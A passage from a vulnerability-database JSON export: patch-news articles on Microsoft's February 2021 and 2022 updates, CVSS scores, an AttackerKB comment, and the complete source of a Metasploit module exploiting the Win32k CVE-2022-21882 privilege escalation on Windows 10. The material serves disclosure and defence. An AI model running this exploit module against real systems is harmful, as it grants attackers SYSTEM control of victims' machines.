{"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-1722", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24081", "CVE-2021-24086", "CVE-2021-24094", "CVE-2021-24100", "CVE-2021-24114", "CVE-2021-26701"], "modified": "2021-02-15T11:58:01", "id": "THN:0C87C22B19E7073574F7BA69985A07BF", "href": "https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:34", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgSDl-Y3iL865QDYIL826dIVoAuhn8eV0SzvvDRaBdSQTUr1JT3YV8K0QWzQqog2FJ8BaAFKyMZP9TndWgJksC06Ec6SAXDcVviIlN1uLCwL3VtLfkFy7kLeXAzsDuyEsMZSochSZZLxdGlc5WssfNPVHome1voBOX-c9iQYY0JKE5ieXsflWd8KaIo>)\n\nMicrosoft on Tuesday rolled out its monthly security updates with [fixes for 51 vulnerabilities](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Feb>) across its software line-up consisting of Windows, Office, Teams, Azure Data Explorer, Visual Studio Code, and other components such as Kernel and Win32k.\n\nAmong the 51 defects closed, 50 are rated Important and one is rated Moderate in severity, making it one of the rare Patch Tuesday updates without any fixes for Critical-rated vulnerabilities. This is also in addition to [19 more flaws](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) the company addressed in its Chromium-based Edge browser.\n\nNone of the security vulnerabilities are listed as under active exploit, while of the flaws \u2014 [CVE-2022-21989](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21989>) (CVSS score: 7.8) \u2014 has been classified as a publicly disclosed zero-day at the time of the release. The issue concerns a privilege escalation bug in Windows Kernel, with Microsoft warning of potential attacks exploiting the shortcoming.\n\n\"Successful exploitation of this vulnerability requires an attacker to take additional actions prior to exploitation to prepare the target environment,\" the company noted in its advisory. \"A successful attack could be performed from a low privilege AppContainer. The attacker could elevate their privileges and execute code or access resources at a higher integrity level than that of the AppContainer execution environment.\"\n\nAlso resolved are a number of remote code execution vulnerabilities affecting Windows DNS Server ([CVE-2022-21984](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21984>), CVSS score: 8.8), SharePoint Server ([CVE-2022-22005](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22005>), CVSS score: 8.8), Windows Hyper-V ([CVE-2022-21995](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21995>), CVSS score: 5.3), and HEVC Video Extensions ([CVE-2022-21844](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21844>), [CVE-2022-21926](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21926>), and [CVE-2022-21927](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21927>), CVSS scores: 7.8).\n\nThe security update also remediates a Azure Data Explorer spoofing vulnerability ([CVE-2022-23256](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23256>), CVSS score: 8.1), two security bypass vulnerabilities each impacting Outlook for Mac ([CVE-2022-23280](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23280>), CVSS score: 5.3) and OneDrive for Android ([CVE-2022-23255](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23255>), CVSS score: 5.9), and two denial-of-service vulnerabilities in .NET ([CVE-2022-21986](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21986>), CVSS score: 7.5) and Teams ([CVE-2022-21965](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21965>), CVSS score: 7.5).\n\nMicrosoft also said it remediated multiple elevation of privilege flaws \u2014 four in the [Print Spooler](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>) [service](<https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81>) and one in the Win32k driver ([CVE-2022-21996](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21996>), CVSS score: 7.8), the latter of which has been labeled \"Exploitation More Likely\" in light of a similar vulnerability in the same component that was patched last month ([CVE-2022-21882](<https://thehackernews.com/2022/02/cisa-orders-federal-agencies-to-patch.html>)) and has come since under active attack.\n\nThe updates arrive as the tech giant late last month republished a vulnerability dating back to 2013 \u2014 a signature validation issue affecting WinVerifyTrust ([CVE-2013-3900](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2013-3900>)) \u2014 noting that the fix is \"available as an opt-in feature via reg key setting, and is available on supported editions of Windows released since December 10, 2013.\"\n\nThe move may have been spurred in response to an ongoing [ZLoader malware campaign](<https://thehackernews.com/2022/01/new-zloader-banking-malware-campaign.html>) that, as uncovered by Check Point Research in early January, was found leveraging the flaw to bypass the file signature verification mechanism and drop malware capable of siphoning user credentials and other sensitive information.\n\n### Software Patches from Other Vendors\n\nBesides Microsoft, security updates have also been released by other vendors to rectify several vulnerabilities, counting \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>)\n * [Android](<https://source.android.com/security/bulletin/2022-02-01>)\n * [Cisco](<https://thehackernews.com/2022/02/critical-flaws-discovered-in-cisco.html>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Google Chrome](<https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop.html>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * Linux distributions [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>), and [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2022-February/thread.html>)\n * Mozilla [Firefox](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-04/>) and [Firefox ESR](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-05/>)\n * [SAP](<https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T06:40:00", "type": "thn", "title": "Microsoft and Other Major Software Firms Release February 2022 Patch Updates", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-3900", "CVE-2022-21844", "CVE-2022-21882", "CVE-2022-21926", "CVE-2022-21927", "CVE-2022-21965", "CVE-2022-21984", "CVE-2022-21986", "CVE-2022-21989", "CVE-2022-21995", "CVE-2022-21996", "CVE-2022-22005", "CVE-2022-22718", "CVE-2022-23255", "CVE-2022-23256", "CVE-2022-23280"], "modified": "2022-02-09T06:40:43", "id": "THN:A19D66C10E6D6239DFCE7CD41A974F09", "href": "https://thehackernews.com/2022/02/microsoft-and-other-major-software.html", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-02-10T00:00:00", "description": "If you\u2019re running Windows 10, it\u2019s time to stop delaying those patches and bring your systems up to date as soon as possible.\n\nBleeping Computer [reports](<https://www.bleepingcomputer.com/news/microsoft/windows-vulnerability-with-new-public-exploits-lets-you-become-admin/>) that a researcher has come up with a bypass for an older bug, which could serve up some major headaches if left to fester. Those headaches will take the form of unauthorised admin privileges in Windows 10, alongside creating new admin accounts and more besides.\n\n## What happened the first time round?\n\nBack in 2021, Microsoft patched an exploit which had [been in use](<https://www.bleepingcomputer.com/news/security/recently-fixed-windows-zero-day-actively-exploited-since-mid-2020/>) since mid-2020. Classed as \u201chigh-severity\u201d, \u201cCVE-2021-1732 - Windows Win32k Elevation of Privilege Vulnerability\u201d allowed attackers to elevate privileges to admin level.\n\nFooling potential victims by having them open bogus email attachments is all it would take to get one foot in the door via code execution. It popped up in a [targeted attack](<https://ti.dbappsecurity.com.cn/blog/articles/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) related to the [Bitter APT](<https://www.forbes.com/sites/thomasbrewster/2021/09/17/exodus-american-tech-helped-india-spy-on-china>) campaign. According to the report, numbers were \u201cvery limited\u201d and struck victims in China.\n\n## What\u2019s happening now?\n\nMultiple exploits have dropped for another elevation of privilege vulnerability known as [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>). This is a bypass for the previously mentioned [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732>) which was fixed back in February 2021. CVE-2022-21882 was fixed by Microsoft via updates from January 2022. However, sys admins out there may well have skipped the updates due to [various bugs](<https://www.bleepingcomputer.com/news/microsoft/new-windows-server-updates-cause-dc-boot-loops-break-hyper-v/>) which came along for the update ride.\n\n## Time to get fixing things?\n\nIt is absolutely time to get fixing things. The exploit is now out there in the wild, and as Bleeping Computer notes, it \u201caffects all supported support versions of Windows 10 before the January 2022 Patch Tuesday updates\u201d. \n\nWriters at Bleeping Computer were able to get it to work in testing, and others have confirmed it for themselves:\n\n> Interestingly, [#MDE](<https://twitter.com/hashtag/MDE?src=hash&ref_src=twsrc%5Etfw>) detects this PoC as CVE-2021-1732. \nThis is understandable since this [#CVE](<https://twitter.com/hashtag/CVE?src=hash&ref_src=twsrc%5Etfw>)-2022-21882 is a bypass of [#CVE](<https://twitter.com/hashtag/CVE?src=hash&ref_src=twsrc%5Etfw>)-2021-1732. \nGeneric [#LPE](<https://twitter.com/hashtag/LPE?src=hash&ref_src=twsrc%5Etfw>) detection [#KQL](<https://twitter.com/hashtag/KQL?src=hash&ref_src=twsrc%5Etfw>) query works in this case too.[#BlueTeam](<https://twitter.com/hashtag/BlueTeam?src=hash&ref_src=twsrc%5Etfw>) [#ThreatHunting](<https://twitter.com/hashtag/ThreatHunting?src=hash&ref_src=twsrc%5Etfw>)<https://t.co/01El9wPjk0> \n/1 <https://t.co/vM2apKJsI6>\n> \n> -- Bhabesh (@bh4b3sh) [January 29, 2022](<https://twitter.com/bh4b3sh/status/1487449316117516288?ref_src=twsrc%5Etfw>)\n\n## Is there any reason to wait for February\u2019s Patch Tuesday?\n\nIf you\u2019re one of the hold-outs who ran into errors last time around, waiting isn\u2019t advisable. Microsoft already issued an [OOB (out of band) update](<https://www.theverge.com/2022/1/18/22889670/microsoft-windows-server-update-vpn-refs-domain-patch>) to address the multiple errors caused by the January patch. As per Microsoft\u2019s January 17th [notification about the release](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#2777>):\n\n> &quot;Microsoft is releasing Out-of-band (OOB) updates today, January 17, 2022, for some versions of Windows. This update addresses issues related to VPN connectivity, Windows Server Domain Controllers restarting, Virtual Machines start failures, and ReFS-formatted removable media failing to mount.&quot;\n\nThings being what they are, it\u2019s likely time to get in there and apply the OOB update (if you haven\u2019t already) and put this one to rest.\n\nMicrosoft is putting a fair bit of work into figuring out where weak points lie in the patching process, making use of its Update Connectivity data. The [current estimate](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/achieve-better-patch-compliance-with-update-connectivity-data/ba-p/3073356>) is a device needs a minimum of two continuous connected hours, and six total connected hours after an update is released to reliably make it through the updating process.\n\nIf this sounds like your network, and if you\u2019re still waiting to take the plunge, you\u2019ve hopefully got little to lose by making that big update splash as soon as you possibly can.\n\nThe post [Apply those updates now: CVE bypass offers up admin privileges for Windows 10](<https://blog.malwarebytes.com/malwarebytes-news/2022/02/apply-those-updates-now-cve-bypass-offers-up-admin-privileges-for-windows-10/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-01T11:07:29", "type": "malwarebytes", "title": "Apply those updates now: CVE bypass offers up admin privileges for Windows 10", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-01T11:07:29", "id": "MALWAREBYTES:6A30A2B661E06D2D7D26479F27BB0EF3", "href": "https://blog.malwarebytes.com/malwarebytes-news/2022/02/apply-those-updates-now-cve-bypass-offers-up-admin-privileges-for-windows-10/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-13T13:09:08", "description": "Traditionally the second Tuesday of the month is Microsoft\u2019s \u201cpatch Tuesday\u201d. This is the day when they roll out all the available patches for their software, and their operating systems in particular.\n\nSince there were no less than 56 patches in this month\u2019s issue we will focus on the most important ones. Not that 56 is an awful lot. There were [more than 80 in January](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/microsoft-issues-83-patches-one-for-actively-exploited-vulnerability/>).\n\n### Microsoft CVEs by importance\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The most notable CVE\u2019s in this update were:\n\n * [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732>) Windows Win32k elevation of privilege (EoP) vulnerability. This one we listed first as it\u2019s actively exploited in the wild. With a EoP vulnerability attackers can raise their authorization permissions beyond those initially granted. For example, if an attacker gains access to a system but only has read-only permissions they can use an EoP vulnerability to raise them to \u201cread and write\u201d, giving them an option to make unwanted changes.\n * [CVE-2021-26701](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26701>) a .NET Core Remote Code Execution (RCE) vulnerability. A remote code execution (RCE) attack happens when a threat actor illegally accesses and manipulates a computer or server without authorization from its owner. This is the only critical bug Microsoft listed as publicly known.\n * [CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) an IPv4 security vulnerability concerning source routing behavior. Microsoft adds to say: IPv4 Source routing is considered insecure and is blocked by default in Windows; however, a system will process the request and return an ICMP message denying the request.\n * [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) an IPv6 security vulnerability concerning the reassembly limit and related to the previous one. The reassembly limit controls the IP fragmentation, which is an Internet Protocol (IP) process that breaks packets into smaller fragments, so that the resulting pieces can pass through a link with a smaller maximum transmission unit (MTU) than the original packet size. The fragments are reassembled by the receiving host. Apparently an attacker could construe packets leading to a situation where a large number of fragments could lead to code execution.\n * [CVE-2021-1721](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1721>) a .NET Core and Visual Studio Denial of Service vulnerability. A Denial of Service attack is focused on making a resource (site, application, server) unavailable for the purpose it was designed.\n * [CVE-2021-1722](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1722>) and [CVE-2021-24077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24077>) are both Windows Fax Service RCE problems. It&#x27;s important to remember that even if you don\u2019t use \u201cWindows Fax and Scan\u201d, the Windows Fax Services is enabled by default.\n * [CVE-2021-1733](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1733>) is for Sysinternals\u2019 PsExec Elevation of Privilege vulnerability. While this one is listed as not likely to be exploited, the tool itself is worth keeping an eye on, because it&#x27;s so popular with cybercriminals. They like it because, as a legitimate administration tool, it isn&#x27;t normally detected as malicious software by default.\n\nIf you are all about prioritizing your updates, these are the ones that we recommend doing first. Everyone else is advised to install the updates at their earliest convenience.\n\nOne other notable thing is the default enabling of the Domain Controller enforcement mode. This was done to counter the effects of the ZeroLogon vulnerability which is being exploited in the wild. We already covered the full story of [ZeroLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/the-story-of-zerologon/>) where this change was announced.\n\n### Adobe Reader for a change\n\nAnd while you are about to start your update cycles, you may want to have a look at this one from Adobe. Because this one is already actively being exploited as well. Where Adobe was notoriously famous for the bugs in their Flash Player, which has now reached [end-of-life](<https://blog.malwarebytes.com/awareness/2021/01/adobe-flash-player-reaches-end-of-life/>), occasionally a vulnerability in their Reader attracts some attention.\n\n[CVE-2021-21017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-21017>) is a critical heap-based buffer overflow flaw. Heap is the name for a region of a process\u2019 memory which is used to store dynamic variables. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.\n\nSo, by creating a specially crafted input, attackers could use this vulnerability to write code into a memory location where they normally wouldn\u2019t have access. In their advisory Adobe states that it has received a report that CVE-2021-21017 has been exploited in the wild in limited attacks targeting Adobe Reader users on Windows.\n\nBoth Adobe Acrobat and Adobe Reader will automatically detect if a new version of the software is available. The program will check for a new version when you launch either Acrobat or Reader as an application and will prompt you to install a new version when it&#x27;s available. IT administrators can control the update settings by using the [Adobe Customization Wizard](<https://www.adobe.com/nl/devnet-docs/acrobatetk/tools/Wizard/WizardDC/index.html>).\n\nStay safe, everyone!\n\nThe post [Big Patch Tuesday: Microsoft and Adobe fix in-the-wild exploits](<https://blog.malwarebytes.com/malwarebytes-news/2021/02/big-patch-tuesday-microsoft-and-adobe-fix-in-the-wild-exploits/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-10T17:26:33", "type": "malwarebytes", "title": "Big Patch Tuesday: Microsoft and Adobe fix in-the-wild exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1721", "CVE-2021-1722", "CVE-2021-1732", "CVE-2021-1733", "CVE-2021-21017", "CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24094", "CVE-2021-26701"], "modified": "2021-02-10T17:26:33", "id": "MALWAREBYTES:3C358DDA439A247A9677866AFE8FA961", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/02/big-patch-tuesday-microsoft-and-adobe-fix-in-the-wild-exploits/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-01-07T00:50:57", "description": "A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to function on a wider range of Windows 10 targets.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-18T20:23:38", "type": "metasploit", "title": "Win32k ConsoleControl Offset Confusion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-24T16:24:20", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_21882_WIN32K-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2022_21882_win32k/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = AverageRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::Deprecated\n moved_from 'exploit/windows/local/cve_2021_1732_win32k'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'Win32k ConsoleControl Offset Confusion',\n 'Description' => %q{\n A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being\n treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to\n achieve an out of bounds write operation, eventually leading to privilege escalation.\n\n This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.\n In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is\n is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to\n function on a wider range of Windows 10 targets.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n # CVE-2021-1732\n 'BITTER APT', # exploit as used in the wild\n 'JinQuan', # detailed analysis\n 'MaDongZe', # detailed analysis\n 'TuXiaoYi', # detailed analysis\n 'LiHao', # detailed analysis\n # CVE-2022-21882\n 'L4ys', # github poc\n # both CVEs\n 'KaLendsi', # github pocs\n # Metasploit exploit\n 'Spencer McIntyre' # metasploit module\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n [ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'References' => [\n # CVE-2021-1732 references\n [ 'CVE', '2021-1732' ],\n [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],\n [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],\n [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],\n # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit\n [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],\n [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],\n [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],\n [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],\n # CVE-2022-21882 references\n [ 'CVE', '2022-21882' ],\n [ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]\n ],\n 'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n 'SideEffects' => []\n }\n }\n )\n )\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return Exploit::CheckCode::Safe\n end\n\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n vprint_status(\"Windows Build Number = #{build_num}\")\n\n unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)\n print_error('The exploit only supports Windows 10 versions 1803 - 21H2')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n encoded_payload = payload.encoded\n execute_dll(\n ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),\n [encoded_payload.length].pack('I<') + encoded_payload\n )\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2022_21882_win32k.rb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-02-04T23:12:26", "description": "Win32k Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21887.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at January 18, 2022 4:35pm UTC reported:\n\nLooks like this is a LPE in win32k that is being exploited in the wild according to Microsoft to let attackers escalate their privileges to SYSTEM. Attack complexity on this is high which is understandable given the history of win32k and the complexities regarding its architecture which was built before modern security mitigations were implemented. With that being said though the finder of this bug, at <https://twitter.com/b2ahex/status/1481233350840893442>, notes that exploitation is easy and that this is a patch bypass for CVE-2021-1732, which was a window object type confusion leading to an OOB (out-of-bounds) write as noted by McAfee\u2019s technical writeup at <https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/technical-analysis-of-cve-2021-1732/>.\n\nOf particular note here is that they credit Big CJTeam of Tianfu Cup and RyeLv aka @b2ahex on Twitter for finding this vulnerability. They note that this was exploited in the wild but the mention of Tianfu Cup is interesting as it suggests this was also reported to China\u2019s government via the Chinese Tianfu Cup hacking competition.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": 